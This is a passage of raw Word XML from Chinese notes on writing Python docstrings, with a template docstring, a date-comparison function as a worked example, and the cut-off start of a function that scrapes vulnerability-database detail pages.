    <w:p w14:paraId="2B5F52FA" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FF0B87" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def function_name(param1, param2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69F132" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456B2A8" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个函数的简单描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1096F1" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007B996F" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9F0CC" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        param1 (type): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185781CD" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        param2 (type): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>param2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B6395" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C845F9" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3146D6" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是返回值的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077505E" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52EAB5" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44030350" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789A92D9" w14:textId="42A2DAB8" w:rsidR="00A567C6" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PyCharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和其他一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持这些格式，并可以根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docstring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成相应的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法签名和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8220E" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A633965" w14:textId="57841A18" w:rsidR="0081769F" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="839" w:name="_Toc159780259"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际示例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="839"/>
    </w:p>
    <w:p w14:paraId="01703DF1" w14:textId="77777777" w:rsidR="0081769F" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3AA2AC" w14:textId="77777777" w:rsidR="0081769F" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64ADCF79" w14:textId="77777777" w:rsidR="0081769F" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>timeCompare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time1</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time2</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用于比较两个类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'2023-05-17'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的时间戳字符串看谁更早。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>更早或同天的话，返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Args:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        time1 (str):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>传入类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'2023-05-17'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的时间字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        time2 (str):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>传入类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'2023-05-17'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的时间字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Return:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        res (bool):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>datetime1 = datetime.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strptime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'%Y-%m-%d'</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datetime2 = datetime.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strptime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'%Y-%m-%d'</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>datetime1 &lt;= datetime2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03906A55" w14:textId="77777777" w:rsidR="0081769F" w:rsidRPr="0081769F" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2887C123" w14:textId="77777777" w:rsidR="000B4BD6" w:rsidRDefault="000B4BD6" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>singleCveHrefSpider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>avd_url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>avd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>编号，匹配单个漏洞详情页的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Args:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
